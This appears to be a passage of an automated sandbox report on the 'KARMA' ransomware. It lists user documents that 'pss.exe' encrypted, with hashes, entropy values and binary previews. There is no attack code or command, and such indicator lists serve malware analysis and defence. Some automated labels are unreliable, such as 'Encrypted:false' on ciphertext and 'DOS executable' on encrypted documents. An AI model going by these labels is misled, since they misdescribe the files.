Preview: ....7.....<.0.(....M.......<O....imx;....<l....5pb.D.\.Bg.~l....KARMA....?...). 1|..c..%...b.-L.....y.R7as-@.o......Gx$.......;wS5ZlM..J...j..}.......12......D}..sw3..O.....X...5.t..^..p... ..=.P....O.)(...$...N..Z..E.+....E.^Z....O.2B.7.aCE.`..o..>Bb.].......V.e.Iq.V...S|.S..wUj.q|..Z..4.-.}...%.!.o4...).u...y.=.x.LO.......8. "..V..t".=;r.hpG........MQ.>'..Y..q.[J..'.Du....uo..$..'. ..p.Sqi...o9..a.......?Or.............v)..$...XIF..q..5.Z..[G..vyd..N.7.6...6..C;.tA2..r_r....u.9.F..`..P..`.a....$<.....24.......F..N..s.S.H...]}...d.u.(el..j.R../...T....ln.,......yC.O.$\{...3.k.s.....b..././...x....eP..w7..'l.J6.m..S..x...{r..s..~.i.....T..N...~.....].......3.v.8.oK...f..2..a.XL.6...x....7.)....WZ.8}...w.2b6.t..S."..].A..,.....Lo......>.6.....:...3.Q>.../.. A.B*9T_........%b.T..W/....wg..du..6...5G......k..T....z..$.0O$.R4Q7.d.:1e.F..3.`.4^<.J...<]*~k.y>....o.E..`Z.n...f.Nf.g4.#.o7.),~.%..J}../....K..n..V=.".k...g.....O......h..,..
C:\Documents and Settings\user\Documents\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.798729109296202
Encrypted:false
SSDEEP:24:KgftBdZeNSTYGQTJF8UavbNWkkVk3XPt9pZ:KefYSTYdSNWkkC3XPrD
MD5:AC9A0B8D2CBBC0A80BB999A18361EFB3
SHA1:F0BB870381F3E21D8C5B6A02FB95B785D363657C
SHA-256:765138565F06A3DEC53D15BE016837E52F97DAA6726352768CD9CBE0A1B64D34
SHA-512:C2ABED670C641D12420E80EAC498AA87FF79E178992F3D8F39BBF5F5882AF77A752DDB4F17E922CAC79BD6690967123E76C3850DE0C9F47B206AFDEA0AFDB595
Malicious:false
Preview: .,/.\...?.l.-8|;....'$<.....~(...........?..?..m.[..e..?...KARMA.F.laNo*o....1.q8. (.iz8<>.......H....4m.M...X.1............E^.....n(.....{W?...O..h....(......\..U...q...M..z..W."^?o.6.G5.+G<k..Jk.|f.[B.)...;_..R...p)....R..k.o$.Q...07...w.I>.\..%.........);6H.<f...}G.o.T.....$..k.U]..~......A..b...{.g4=...F*UXA.[_V66....U.~.mX. pq..>..\5h..Dm...v....\Q~zZb...L..B.......'.e..B..5u....?....T.2...m..3(...K...+.j..OY.....Z.0..b .>.M...o..G2(...u.H.:. GDGI,....F.|..G..6.3....)v.8.q.."....jH..C."...Z..Q..sU3k."mA...F..nf.*.I.. o.$-@.....b.....M...J.)......;UVR.+.....-%.....t..O..=kGVj...|..H)..........'....Q...Z'r.......2..qFED^.7....c5.C.T.B.}!.0y...q.q..Tj...m...gZ^N.'..../..".<Nc2.Qn....4..U..].~...J.|.xk...=/G.i.eeoryE.{.t=...@.%.......k.5.(.'}...I...n....$.<g..m@..3VtR....3.x.s$T.....K.[@].@$V..FWR.i.x....[e.[.........f.JT......W.n...&.......2.....%...H..eJs.~.<...._.....y.A..).U.B...!j.&.z..<..F..G...L....N7Vzb.l.h.S...[5.......N.Ub...=
C:\Documents and Settings\user\Documents\EEGWXUHVUG.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.807179350599828
Encrypted:false
SSDEEP:24:BRJ6PoB7efny4CIFGky15tbp6PbqwSq9Y9bE0bNpzziHLl7uAvMfi:p6PoB8yEGkyPREP/l9EbnpzzKvN
MD5:C34523ECF1594EFCF11DC45D9F470BBA
SHA1:2F5999B8D5B82821CA3E0D3311D0D67E3229AC78
SHA-256:B504050A55A0BE33C2563E623EEE097193748722FEA26CE413C501B8B4990150
SHA-512:F900B285D7191875856A9A61F568BB01F1E0F2A92881AE2E5CF8F1267475F760EA7093ADC303C1D9E6C730AB3D600C7318FB5BF721A19C1DD6F12A64B5F14AC1
Malicious:false
Preview: B^.y...*.D..-....P....r..rU.......!....6.U..t......p.PVe*09...KARMA....6.o.........S...........;V..%iT...Le.l.....G....xL....JC0Q..6'.6 ..2..w.K.Ah...E.0..0..M..}%....A2..V...u1,'....x..\3'.4s%l.i.%+....d.e.5[...-..pz...I..n...R....#...w."..?...Q......S..X...0.va#...H.V.<....Rq.}...1L1.^@.G.2.E...V..].....$.-.......|../..V..Y...N">..@9$...u.luP..G.'..+..Y.!".p._.....!'...=..T^.D0.EBP1.....[..L"r.Ef?.....zQJ..v.gNk..~.I.;...<...;..J..6Tut....c......l.z..`x...9N.MW*....2.......4..c.Yt....iH;,dKPi/.A...Gm.t.I.k..S.`..4..te.&,.;}.o...$.p#.s..{...;..d.l..R.,.)../....S.W..4]dA..y#>?{ S............Q......?.,...*`7..,.....m.V)..M#6#.|..&^^.6..]wp^...H..4.Y.....YW...9.w......n*W...^.jU.F.X..4...e`Tmm.B`X.WS...(<.V....C.OK*W...^..}.7.'..q...!.......e.C....S..d,....9Q,.Ky..CP..0./.......Q..q....._4.Q.....M....A.9\..B......H<.5e4.H.3..O.....*&1<.Z.;'.G..A.ns.J....9.b_.1.~+....5..tQ+..:(&..D}..H..Y./&);..5=B.+&k...lh5.xV.N....XR... ...g._BV.u...V..)c._u
C:\Documents and Settings\user\Documents\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808229798797674
Encrypted:false
SSDEEP:24:Py6HzcPt0fhLlnbwA7t/uPjUF3BCEt6Cm+sg2fVl4DytUw2Y:PZzatchLlnbwA5u7UF3t1l25iY
MD5:E0BCB0E19DCF4D66D9386AFA3D2D8572
SHA1:DBF9AFF1277807C92E41764B0F4C0D60C317917C
SHA-256:5A5988D465B3713A7242620003A20835EAF4D45369CB5CDDE6C4671D54B2BE56
SHA-512:4BDD75967F754D6E8E6EAA44A213ECFB18EE050118B337731BA26D13480546E9842D02B1AF7DF1B42BC04A9C02BAFC7D413250461F64035706E6618144EBDE3C
Malicious:false
Preview: L.afA)....0....RF..l........3!..|1...{.O}..nn.^.....dcq....KARMA.<.-.+E..X~.^J/..2%.&...,.S...\.e....[G.7..)K*..h......md..p.M..n|.Mk..v....j...#.....:.Rl...!7:..Q...8.X.g.eI.8e.+.kl....l.c..^.3G.....J..8Q......z...<..R..Gf...b$tE.8|..hf...-I^.s.Q]k.\Hr=.....J.....qE@(.l..I.).V....\...3.6.C.#l..........a..qU9.X..(......2n......7.&.....:.:....?..n.u.ql}.k.....G.(..8..z..P.....+..Y...R.........;...S.u.F....w.K..........~.hS?......{.{\.tW8....9...}4.^..^..-3...#]!Y..*...d}R&U....v..,.D.l..D!M..........t.icJiq.0.Og:.^..G.Pa..l....2..,.......B^..v.!.r1c.4.".A.......X...^..z.........#.C..._.D.s..u...t.y....E.. $.K..-..2.t.JRW....c...w......X}trn..|...p/-.(...Tu.?.. ......9..P..la....b....`.`.1.....5..\O..adb.S...m<R..#,V..&...G..=p..........h..*L......i..uR)p.+....'.FE=.s.#.+W.'G....q2.op,.'{1`y:.!.e.NF.....qV..jw.....I.....@..5...K....]..c...5.a.n..%b....>....X$ .B...VJ,.p6.j..A.D..o..:..uo.dZ0..7.?V\...8........*<.S.l...i...j8W.g...`|@`3.%]o...
C:\Documents and Settings\user\Documents\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.820764315499837
Encrypted:false
SSDEEP:24:1BxPhz8B2uFaWKi8VTqB3OnIPgU1VTQHz4EaISArtT5t:/IB5Ci8U3OnogUnTgz4Nwrhb
MD5:F0E2463BE3320B989A2101E8DC426920
SHA1:32CC532557985E757965BE70F50A0A15DC8F30D7
SHA-256:15703CAFF9B47841C9BD7DA3B0714BB97F6654F025063A5E1C1CB6299B856A6B
SHA-512:FAE3EC695914C208C7438C0922A14E15B47C16592F71468C3560F5F02C6771563985DD4819CB6CAD875266C03C71FAA3251BFE50C7BF583DF8A3EA362F7E505A
Malicious:false
Preview: w.....4.h.ZM.12<.wNp.~j$..#....g..qkQ..>0.b...Z..!`;...]...*...KARMA.c....x..1$... ..'.}..3Z-.g......PSt...t.C.....J>v...SBx...L...5../.D.a.N....T..[U..Y..H.R.....l"Uu..J......m....T?>..B%..o..K%..B..t.6...`.W#C~.LVl..b...<..}..O.....r...?m...n.....o..X....k..=..4.l.:!.%t.-......s2..t....o;JP'......c.4.,.....?..].......c.. .*...We.#@BR.C=2."'e.3..8SUs)z...o|NEe..A.....$.d,V....j9i3..@Y..C3...D... ...".t.zO..z...x...S..gAc..$...v.....|......6...P..z....u0;.?.._$e.....1..+C..B..r.r.J..GU...#..7....J...GW.....u.T.0.>.....B.h2.j........nU....B4.k.!.j'.2...]...wR.."...w.{..*>.S$.......v^..Z.z&...+.|.....b>uU..n.m).m...I.l..rr.I.>.~..(u.q.....dI....m.92..S...L._.|I..i?...:f..2..x.....5.]......6o\..,..H.b...+,.,{..P/..o" .g.'T.2)sE.,.....S)`.B..S&>.....1+.YU....+...4...<....eQl....J.S......><..@c......h....I....q.[iM.?...7u..o......^.....B...h<....m.]w..RT...`...j)..._.....'..\BS.4.ER..N-.v...B....$.......3. ...../r.....5l...$..~;a.....YO........u..
C:\Documents and Settings\user\Documents\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8309656220719575
Encrypted:false
SSDEEP:24:kvnBe7/TS7GrIYinLEnQpmN06IpOr7h202UUEoj48G9:4nBe7/e6rfiwnXu6AO3kljjg9
MD5:50C5BAB77C71B5636CEAD09194606F7A
SHA1:4A272025FD2A92CD26FDCAD3C87162560F9C5FA5
SHA-256:8687FFF0371544BD5D4A1AD77D62F6C043C9070C928129922F575E9ED0B1AE32
SHA-512:4C3EDE3E0DD6FBCC3D5CEB9E97E94C7CF8BC314F7B42809C77BE610AE8A2C20E0D14423AEEC5A7BE30D853F8BEC7F887E4EFBD626EF2753C36AA2775D8B6CE2C
Malicious:false
Preview: .Id5..1z......,.....-.<.].....'.......,...}B#..^..`.z;......KARMA@Z)q...^(p.l.n:.X.#.........R.E..5..a..5.... .L.Pp.a.."$...T}D.I.As..^.."..=&^;F..u.._.1.gL#Sk.,"x.....>.`.._...........h.Hl.U@r..&^.....}v..Jx....r..D...`.......K..g......T+..+.71..*~..[.+..)..x....t..|..,rsa.~..`t.X~,IV9....M..R(0...w..K..,..b....l3.. U..(..i~9...RB'....Q...t.i(.....2......{."a..>./.er.e..D..`..ff.D.\...aF...++%.....O.J..m..?.m...R.......vz...4.i..}..T......1..V...M......#.,..l.b....D..Ie..t..g......[s.M..yW.....~.J$.:(.O..G..{bt8..(..3;.}P.T...&..v.|....C...&....._^.&..A..........;E.!C..7.&..Q}.....(.P...|K`..B.&vP=D{..R.3<>L.V~.....&..c.CDE...S..e...a)M.DO...P.k.....nX4.n...}.s..]....5:..=..Y:...\m.p..\..t.../K}.G....."..M...<..).].0.c...'h)....K....+r+...hq........"......s$.g.)...Q.*d..<.. x.O..}.";..F.H!..R.s...D<..Mk........:5...[..5..)...~}.z.6*.g=I*.4.q.'-d.a..A .h...P%hM...6..Z.....0M.u>l..K.....\.*...D?..x..~....._q....e.?..+.h.7jDv......R"...$..?.>L
C:\Documents and Settings\user\Documents\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.80717479311287
Encrypted:false
SSDEEP:24:KKyoR0yYmBixtK97eGkNNXFgzzXP423Y8wEb+WcwNNk7Er2:KllfWHo2zXPNInESma
MD5:01CF78C85B368E01A5D6746C05971D08
SHA1:DB13E5E8523DE58640AEBBA82C66AEC34BF5C6C7
SHA-256:B353236E5E7914DE49D939F02CF57421CCD9C350D0E30189791AB33BDF332A8E
SHA-512:7D99E7B1927348AB248B6845FE3FEF150C7DC1E2FBF21718D3B073C85AC9866AC6B5B09838264687978273F7E8AA849A8E7C733E4BFB604F8BE2FCDD596790E5
Malicious:false
Preview: .@/.3U.G..a.{.....d'..I...x&...d...I..f7a.fIm.q....7...r.`...KARMA./n.k......X......"if..U..f......j.c..._...t...5[^)......1....DQ&G......Qie....0.....6_V/m~.9..e.......Z|d...!.f.c./....S+.......sd*.......v...`x.)....LI.n.%..I..S.#.;.....`..|p_B'...+<6........'....530..7...7......[...J.N.D.}..[D..<-.....5.5....N*A.`.....=./..s=.4T.e...r..T.-...GOFN..&2Y.......t...@>Cy.Z..K..a..H.mB.^C.?T%V.k...7W...$.....r.....`,.\..%@...bf@. ....6..s.7J.>..1.&R:.~...r"r..O.B.3....M/S.q.m.IA7...+b..y;jCo.w.l&6.(n....J..........cB.nt...<. .w.w.".....S......j...6<7..Ai..0.O\j.oQ.....'..IH+..(..9.3P/q>h.}.&.....7w..U5....\...].J..]5..40R.q.e.....q..;`.a...$.....\o.yN.. 7...Kx......v3o.RE..f.$;$..#...<..A..3...dW:.....S.Q.#.y....f..n..T.....fS/...:r..Y..!.t|u;.B..GI..l........2..f.VZ...>I1...gt.....3..w.LJ.Y.>......`s..(;..;eOq.t.8$...Zc..k.<...A.$d...Q...m.I.}....w.M...8$Ne....Q..YAr..BN.%...wh9...$I../.ob.Q..0..J.H[..s.."s.K...2S..i.h.".DJ.s..v/9.J,...I..
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8280602413678
Encrypted:false
SSDEEP:24:j0rLVK6HOyiQyifFr7LAHebKgqDLh17h9lHbU99M4hZ:j0rLE6uDaPLAHeGvDLh1nFUr
MD5:BB63825AA70EA0FDD2818D2A7B166363
SHA1:35DFF0E9847C8C08DB5E7BA9C3F9DCB87908E255
SHA-256:D39AF3E5304EA32355808EF46535DFF3760E4B118FEDCA56607C78C09711A24C
SHA-512:3C2F8DD35BA949D31DAD4F48C35180BA7C6B443A227B9A02949F65B272AB2AF59C467EDCCA7D0B3DF779D5430EF45140BA31B2CF841A3A247846AB0EEB6A171A
Malicious:false
Preview: ..2...R..z..)Yr.p..oa,..gR.......eC).% u.!h.F........:...uF....KARMA....n.w..e.h..u...gi.F..#.Ko...P.H........S....I#..-..)...\.....6C...{V.}...w...h{G.3l|_7...K,..+.P.:}..1.#lT.ux...Y/..Hg.#O..!...../.......F..;.`..Y#r...`..5y..y...{..V.....zp....HR........8...,o..YMA.4........?.Ytc.r..%3.0-..!....a2at...s.M..Z..J....<..jz...et..l...+.(..+.O.@....rJ.?U.WB.V......ZA...b*Z-..O...^)X.4:.Q.q...h]..q.....1:.*......@..<.3dB^.6...Dw!.Df...b...x.d.........wlUE..k EJ.r...#.%...'..V...........3. ......35.p....g.I"..S...`..Dx...C.$....v....@OimzT.<.....i..zpu..{..p.B*..Z.....r.....6......b.8.......MsW.*b..K..Q.l.[#..?d...*..{...QsZ(.D..kFy...bt.....j-JC.Z..l\7._....jT....e.@..!.d._KG..U.I...<..X......R..-.....4..v.5<7...I$......S.....j.iFTO........i....>...\....J8.I.....=....H,......'.....:..N......8...O...#....%....7..o..1......7..2..:.i ...D~..kx.....^.....]..L...zd#M...........o?KOw..J..6VF.u.=....X.k...CV.....2..i....<.E..m.N.I..a... _].6
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.827362631974762
Encrypted:false
SSDEEP:24:JSh+v4MIeFnMoPOjiTmz1uPkqI0u5pceikmDnp9o0CE720V6/cTD:JSKxIeFnMorT97I0hlkm40V720VL
MD5:60916CECAF96353BD206316F41567952
SHA1:6A0F0C4529A076A7F9DECF168526F0891837AA9A
SHA-256:17D31B810FF5703EAB936E8BC14325D6AABEC048C68D18D0BBAD376C6B21903F
SHA-512:DA193A154467C5C5B2D9CA2E302E3A949EC57B9BE3882602C202E0B117BF3F92ED4B70D9F8D3690BD9CA6B4E21124B00389A900120F05C017A0CE20C4C6E47F5
Malicious:false
Preview: .? q .A.4..8....!S...T...w.y........ls....V..GM...X.h...M..F...KARMA>....q....4/8F..Q.rY%=....W0....Q..e.r.....:..h!....F..O1G...?.o.K.6..{d......_.....t..3R7....Sn#f....Vm0D......X... W..T7Mz......'51..u.`.r..w/s.s.9F...^.`.._+..X.=.......s...'..mo.{....fb.^...*.......W.[.?A*.F.n[..R.]}.&_.lW..p..w:.H.!pQ..G...C....C.(V.K....}.N..e..^R.uHh..E.q..[.~X..CZ.F.jv...lB..8..>...C.. .'..C@Y[)I;..0j...f.=e.B.f..)Ni~P2........"..2`.p.R...<......-..7 . .G.HA..F.."....,*..+"v@..Uw.P........o...P.dm.h.j.(.W.e]e.~.......$xz.@;pA.%4....... .:3"\U#..%%}...........f.`>.L.0....i.lv.*.A...J...p.n....x.|D.+....e_.$.c.Bl.0}...9'..F...$.!mK..v../.ma..O......al.9.....l......kE]t.W5.-rO......Tg..5q[-nH.?..@...(7...h0..V.....>I..|.....R.....bO..F......>.."....8..B...Y<......xg.....G.sN8....c...9..-&..+.E.#..,.K...bo...K......T}'.u.c{.YG......^.Z...M.h......3.B....*U.......X@*..l-..@0|.`.X..^].R;n.B..L.7p.g.......X.W.d......o~.l.F>..E.;...S.e.+..l../...V.Ox.F
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808696676583605
Encrypted:false
SSDEEP:24:CsOtEhpeQyQDne9J0oxPV0RI7gNSL7Nl7HlZQSkHBD8slEdI:CFnQL80r8L7Nl0qslEi
MD5:62A3150DAFD2222B09E019BEB187C7C0
SHA1:528260B86AA2DA8615B1367C450F4EFC850F1416
SHA-256:1780B6E965FC7850F52D888090CE09866204EB5C6A56362B8547FC671897EBA1
SHA-512:1E950212A4708BC16E4CA6AE88FF21C9F49CC9D46C3868A3A2FCFFEC65000B2BB2D455D917A04FF6DBD9627200627AF82362F4D7E5265E35EA4261FD3BFD5F5E
Malicious:false
Preview: O,4......_P....W[1:dEn|....sw.....K..I..|J..u.........:.a..X...KARMAjBEpLt.u...-....q.<I...S&k*y_6L..u@...y.+B...........dm...,,jT.dP.._e3.h......k....=1+Ek.......)vw....5..9......R..E..C..9.m.2.m/.y..u.8.G[.V4../..04i.......j:M.h...{...J.t........)...)&\....CO...r.!..3..*...vr.....L.......J...(.w$>...VQ.5...4..|..T...+....._.0.......J...y...A.....2G..8/-....J...?u..cLb.MSV.O.@.H..'.H.P..\.A%0.....Z.L.:.u..er..U.&.y.....7..*..F....%....p..y..j1U.).h7..........4.v....6.3}..eT...Y...C2....+...........g..5...0.=.A..Q6I<3X.01.>...7.......m...{.h.o..k.bZrW......iX$"....<.0...."`.~......f..&..G.+E.V..M......vP.w.A...Zg3...8.u.......oJj...&.\...!....k....E.1$9.i...u....;..x.&8.p.v.t...ui\.u..n.A.}T.W..0....ZV......z.$^o.y.....Y1.{w.....7.F...m. .V.R...@.._...^.p..|..n..%.e.n.$..X4u.Q.....d,.<...b...i/.L.j....$.b..o3..0.S`..`.[..`z<_\...8..VG.|.B.f.T.SsEgTh..*.8....t.......2Z.......}......vm......../N...M.s..!.E....Y..i$.../8..[ ?/..*4.c....6a4...!..t:..
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829407730277449
Encrypted:false
SSDEEP:24:8xh05gXWzCvDWELX+chpfslq98IPbHHqHvcZcOM7cvOVWcI9OMzdBY:8z5vynwslqH5j6cv3jzo
MD5:B747B90642ABF6FC3443E8EE92FDEBB3
SHA1:660E8F35844CFDBF15EB14D3D90BDB2F191A5938
SHA-256:4DDA8BC948807C6DFC1E966472226EA47C8F19E16ECCCBEE49DC8F07208FAA16
SHA-512:48C6C628AD335E79347F67FBCC98CF27390FCD14BC1C23A4B7FF8790020C3C4631E8E8E82D2D8AB49D703EA8338E17396227D999D1C8D34BBB689D0CD7570CEF
Malicious:false
Preview: ......:....d..z.Z..r..^....9...d.s......SS.2..AQ....2.F......KARMA0...[.R...:.y....PB}.GC~.k..BBn..._~\*..N...h_mJ.]..mu!...z.0..JO....2.9...?.cr.@.1........%!.*HN.C..W..:+7.~.uR....:IR.:P..%G.O.:.j.I..5`|...y..*..<x7..f..SHU2u..kR....%....A..a.C.A..=.~y........3S.6u.:...D..C..09.T.....g0...IR..aDdX..1B2.j_WQ<\.y.H7. E......*A.}}..Kt..0..r..$..D..4}..........~..{.M[......a*...:...4Q..U.....@.;_2..|...r..g~....`KA..1..J.cw..z..Y..C.......Q..*..Z..e..M=7..Q.vj[.p(ZT..."|..N...d.....H..@..R?^#>./.\.dQ......-.J.t....e..R]......I...'.pi=F.:.X...M...M...Z..$|z.m".@.R...9......!.m(v....J..GL.S. .".9.?n\..nL.).p ....l.,.8.F...9.5.#p....l...B.......N.E<-.zr..VI..4i'./..'.zr..YV.......w..nw..".....2H/...]...m.<l.5....}{(E.......M\.Z.>..No..[.......U..@.t.1...y..D...Y..H;...y.~h....gTc.4AE.....6,..r?.&!...[?.$..2..x..S...y.\..._B....G...~..GsF...!..q...<"............$.r...:..gy.A..%q....[>.+..f.g...k,...[fhKOp.l..T....d....\.....3.2.uL..C
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82386632332941
Encrypted:false
SSDEEP:24:IHk8+GcDHniisYnRnCmg9ZnVl68ZW/Q8h3MxBXCPN3wb2JRLUSrtZI1Ma8TQm:IDcDHbfc9V6878h8xBXCdFL8m
MD5:FB0FDE172152ACF3F59EF31F82A4D7B3
SHA1:79CD4678BF5A9C42B5ABA072394CD0E54054C72B
SHA-256:947B0357AD66757135B3EF5150137A1742ECDAF610157C4C9B6ACA302D078461
SHA-512:C4B6C8D17528055991E71BA3D1736F495ABD96A6C4E92835A0FF2FE3F74C49D36428C5F58742D63B66CB4A8A065224EF3B3B0EF00E5664EF7D73CFD96CE7A5EA
Malicious:false
Preview: .S.5.vf%%&.T.<`...4...85l...g....9.......SP..L.`.6..U..I.c...KARMA;......Q{......T.@Z.F..........;.g..*..F.i.XD../.[...yzl. .*..~.....k.ZX.....;.]\.s../6..+.......I....~.|v....E..*..H .....7....r\..hEw.l.b.....OS{]......{..x...d...EW!Q..:....4!q.fH.[T...?...P...x.7&.......-ct..:.xtB..w..2.O.Ik?.?..&.8}..=!5l....m......s.G....._.X.W#..c...p.W..a.M'.s.._'.>.n-....&..o3...uUw.7....0...em.b..pF...;....Y,m2..$..bR..".......{dZ.A..(....V...G...= .....A.H...- c.,...z.N...8%.Z.E.x.JG...h.m}Z...]n..3....9.*..|..Z.....*..`Ln....s...%.-.".TQmf+<H....|.z..?....;!D-z...}u(..7..!...O.q..{.r..R+o?>=o`.%..3.3....r{d.y.$]..w<$..y.m^."shK....2..&.....&'......sv.S..R..@z.1Hw}2x.R....W.U..\z...h..}XU.....@..9... ..X.=.....ek.-.c...r..\U..z;.L.Tv.aU\.....kfD..Sc*...k.Su.y..D.."JP5......2[...L.d..X`<...E..............N.E.n...dP..O.....J..]..2.D@{t...]..i..."[.Bt......=Ubv`.....j..-)l.].."....H/v.{.>a.x..1.I.......+.q..N.+.^F5.J....ON..7F.Yz.t/........ ..|.>..-..x
C:\Documents and Settings\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.799274125397833
Encrypted:false
SSDEEP:24:++uVUcj42JTf8RUhWVa9sStZU3fI2zSa1D0dbWnej:aUc826uKhS7UPZFhM
MD5:2D2E181D2E2B0A562D5723561FD981E9
SHA1:AFA30B68377692962D6ED12A66392023DE66D357
SHA-256:6EFB83DC68B27A9312AA0517C12ECFE6700032AAC64630772AC0243E60D49FE7
SHA-512:0DC836DF357FADA57C23158F73338B24F9C1118989147C0CC957C5AA7FAE3C251EFA23648F7E38BF282B0FD0FA22D58559291E23BC86285C6C3030035180057C
Malicious:false
Preview: .cjC..+.....6...n....I....w.....|.o.......Z.N2.M6.%j).pjv......KARMA.m....s..G...7..n3.R.....m.G..dt..)..c..%q.5....y....ed..u.(@lh...e.Z........A......Y.W[6Y.!Gs...\{8E....+.....~..............V..u.j.......8.....{...x..p...L.i.A....c....[...vF.._.._.Uc........lE.)...xE...Ie.!t....h.kB....5u........n..!1...-yx..Xv%.o.>[k..@o..xK....R.v&).6..9......z2.Ja.....|V.H.....}..v..L]..6....R1.....Y;.A...C.I...j.8.q..#.r./.D.......1zI\?L....r.b..d.3..[...e"t.=.=.2\...c.Q2....8.....b.+-.......x.............EW...."...J.&..Jz.d....M..d&. V....nw..S8>....B...A........\i's(.....>)..C*.ZPD.j.....:@.a.G.3m....)zM.zL1c:..|.[j..7.T.]J..Z&+.4..I.Z.8..OZ.u.c.H...X...R.2......%..%.B..aM....7h......)`.*Ec;^.9^......1h..}.........lk70..D..ZU..;..@U.t...e...O.w..~.o..G.:.... .c.3..%e..uf...l.E.........IP........7H..c........y.).....V...wd0......:....#8.. .M.<Gm.b.;h..;.....L....N...=..l.X'.....^.e...[.j.Ku.....r.q.(....d.....fUW@_.....9......sz....*.%.O.Q.?
C:\Documents and Settings\user\Documents\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81205410196831
Encrypted:false
SSDEEP:24:CzKsIDMww2+ttmg7bnJ3b6d75uqDivTxpUEE59iG9Pyi:eK7DMZvttnJ3b6d7wqWvTjGsG3
MD5:0C10F713F76B38A740986181EC9D1D93
SHA1:B7AE6F384E5BCE87711A3E944FBB71D981EE3AC8
SHA-256:37D58AD7E13C8789E8EA57AD7E5965BF1C0FFC9E90466B52D7C7A036F6B67C4D
SHA-512:AE827B6DB9D8F5054C227DE457E723364DFEF58FC858B6FE46F3A37313B67D51A3D170258F1BF510F8728ECDD7CC5983F98CB7B32195D255D541C90BEB74975F
Malicious:false
Preview: `.H.r..........Hw.......}tG...OA.#.~.'...^...#!....v....pE...KARMAA>|..<L....eS..'.....g5.....{.6.&..3h:..I......G....Ux).J....(.......w.....?..X..Z|.Y(.(S..K...y".d4....z5.E.'..\./.B.....~..w.D...ON93.A.a..(.....U.-...+.].....`SUc.'./. 9..i.*...P..p[G~.Td...&.@.x.bm.&<.C.8.)..S.P&.s...=....R.B\~*...K....0a.*........X^....~y.lED6.......%.....J..G.;<....:.rM...-.. h....i........Q..l..}..d.S..2nr..j...(|=f....r;.....Jm{...'..|...R..SR..I.....x...0.-s.`....3.F.9.0. .8..`r.$.}.6P..?W-9...p...v....8....,.=..l....Y..%).Y_G.S.,.6.(..,gh.z.<.jn...).}g........J:.G..'..>b..7J.)?........)..._.....X.P7..v.Z......`c......]..}.4s..c.c...n...[..........Vh.g....)G.8.......,...B5..6.,.o....=.....d.G.&.s..F.6.j.2..d.!/.*WA..p.A...I.U..$.....,B.Q*;.Wu..%.T'..ok...*...m.........q6..2.+oF...JD.<I....z?I.M..Y=..:.'>YHn..-..}k.?....<..7{..4gW].YE.....G..q.8I. ....1..n.HI.7.....U..z.k.4...9.kMn..,].,...<..o.........sa.Z;6.*..@`...P..b^6.3..........9.....Z..!r
C:\Documents and Settings\user\Documents\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.802428226492806
Encrypted:false
SSDEEP:24:0JzIqWntLzTh4tOnznAh3aIKwrDg438vlVOn8J4a3gpesfQC:0hIqGtd4tc7+HKwr/stVOn8JRa
MD5:FAFA4A75479FA68F3926B841CEA172FE
SHA1:683A601D8237EFEEFAABC14C7E9098344B420F8F
SHA-256:65DC3CD3D3B9013F4CA2917CCF094F3B72CCB3F5AA6BE3551B28117A774C6C4B
SHA-512:4729991508CC203A5BC57868C810F4A61C46C688EFE885D7503393AE6AC7BAC65D01B7813EE0D98A7CF0EAC013C7C6D94360ABE25B8872D5C328256E7CFDA33F
Malicious:false
